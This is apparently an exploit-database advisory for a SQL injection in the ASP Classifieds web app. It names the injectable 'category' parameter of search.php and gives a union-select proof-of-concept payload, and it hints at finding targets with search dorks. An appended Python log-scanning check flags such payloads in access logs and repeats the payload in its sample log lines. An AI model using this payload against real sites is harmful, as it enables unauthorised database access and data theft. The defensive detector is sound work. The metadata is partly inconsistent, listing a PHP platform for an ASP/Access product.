ASP Classifieds - SQL Injection

Author: r45c4l
type: webapps
platform: php
date_added: 2012-03-17  
date_updated: 2012-03-17  
verified: 0  
codes: OSVDB-80580;CVE-2007-2675;OSVDB-35597  

raw file: 18613.txt  
# Exploit Title: ASP Classifieds Sql Injection
# Date: 17/03/2012
# Author: r45c4l
# Email: infosecpirate@gmail.com
# Script url: http://preproject.com/pclasp/home/default.asp
# Version: N/A
# CVE : ()

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

Product Description :

ASP Classifieds is one of the most customizable classified ad programs
that exist for ASP and Access. Unlimited images, unlimited categories
and much, much more make it perfect for everyone from those who want to
set up a used stamps classifieds to those wanting to show and sell real
estate.


Product Cost : 58$



=======================Exploit====================================
                      ---ICW---



[ EXPL0!T ]

SQL Injection
p0c -
http://SERVER/classi/search.php?category=[SQli]

PoC -

http://SERVER/classi/search.php?category=-1+union+all+select+version()--

[Note: Tested on demo website]

d0rk - use your brain ;)
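
A defender-side check for the injection point shown above, as an added example that is not part of the original advisory: it scans web access-log lines for requests to search.php whose category value is not a plain integer. The log lines are constructed samples, and the rule that legitimate category values are numeric IDs is an assumption inferred from the PoC's use of -1.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate category values are plain non-negative integer IDs.
VALID_CATEGORY = re.compile(r"[0-9]{1,9}")
# Request line inside a common-log-format entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

# Constructed sample lines in common log format (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Mar/2012:10:00:01 +0000] "GET /classi/search.php?category=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [17/Mar/2012:10:00:07 +0000] "GET /classi/search.php?category=-1+union+all+select+version()-- HTTP/1.1" 200 812',
    '192.0.2.44 - - [17/Mar/2012:10:00:09 +0000] "GET /classi/search.php?category=3%27 HTTP/1.1" 500 0',
    '192.0.2.10 - - [17/Mar/2012:10:00:12 +0000] "GET /classi/index.php HTTP/1.1" 200 2048',
]


def suspicious_category_requests(lines, script="search.php", param="category"):
    """Return (client_ip, decoded_value) for every request to `script`
    whose `param` value is not a plain integer."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parsable request line
        url = urlsplit(match.group(1))
        if not url.path.endswith("/" + script):
            continue  # different script, out of scope for this check
        # parse_qs URL-decodes each value ("+" becomes space, %27 becomes ')
        values = parse_qs(url.query, keep_blank_values=True).get(param, [])
        for value in values:
            if not VALID_CATEGORY.fullmatch(value):
                client_ip = line.split(" ", 1)[0]
                hits.append((client_ip, value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_category_requests(SAMPLE_LOG):
        print(f"{ip}\tcategory={value!r}")
```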

===========================================================================
Greetz to : Beenu Arora, Godwin Austin, Eberly, b0nd, the_empty_, micr0,
Hoody, sam

All members of ICW, AH and darkc0de, and all Indian Hackers



Special Greetz to : b4ltazar and s1nner_01


=== End () ====